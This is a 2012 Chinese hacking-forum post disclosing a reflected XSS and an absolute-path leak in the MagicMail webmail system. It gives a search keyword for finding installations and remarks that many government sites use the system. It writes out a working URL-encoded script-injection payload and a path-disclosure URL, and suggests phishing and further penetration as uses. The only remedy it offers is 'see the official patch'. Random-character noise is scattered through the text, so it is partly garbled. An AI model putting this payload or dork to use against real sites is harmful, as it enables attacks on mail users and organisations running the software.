找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1874|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞$ H% `4 O4 Z) r# T# _0 s4 P/ O
) T3 a6 F- @9 @1 X
2 A; H3 p6 L  u* ]* B  }
包含  一个反射性XSS  以及  绝对路径泄漏
' N* R, E0 K  Z5 F3 F' l看了看 貌似全部是linux的。, g$ s( s8 D$ j. S9 ]4 c: h% {

' t7 ^) F& ]5 l5 u9 X关键字:迈捷邮件系统 by MagicMail; F5 _: `9 O  r) ~% }/ V5 r$ U, _4 c1 k

8 F2 ^# i- u  {% l6 N可以看到很多政府网站都用这个邮件系统
5 i$ \4 d0 D. [$ J
' d- G4 Z& n7 j) c. t. t绝对路径 http://madman.in/index.php?login_type=declare&language=
9 r5 U: j. T- _: s$ J" i( |5 W9 `  _( _2 T1 o$ n1 L

1 N9 a, J( K$ T% Z* E9 Q; K3 }& {* b0 }7 j0 R5 e
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E# V' h& F4 R5 Y, }  ?0 V

% j( ^. ~$ y+ Y+ n
) e; P& ]$ U" h$ ^8 H2 S3 ~
( h9 ]' [2 B2 u9 L" i$ {虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等, Z0 V# e* z+ C: i; m9 s
. C7 Q9 H$ r  o) R( j6 Q
修复方案:看官方补丁吧。
  v& ?/ i/ o8 S+ c2 x4 M$ \# W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表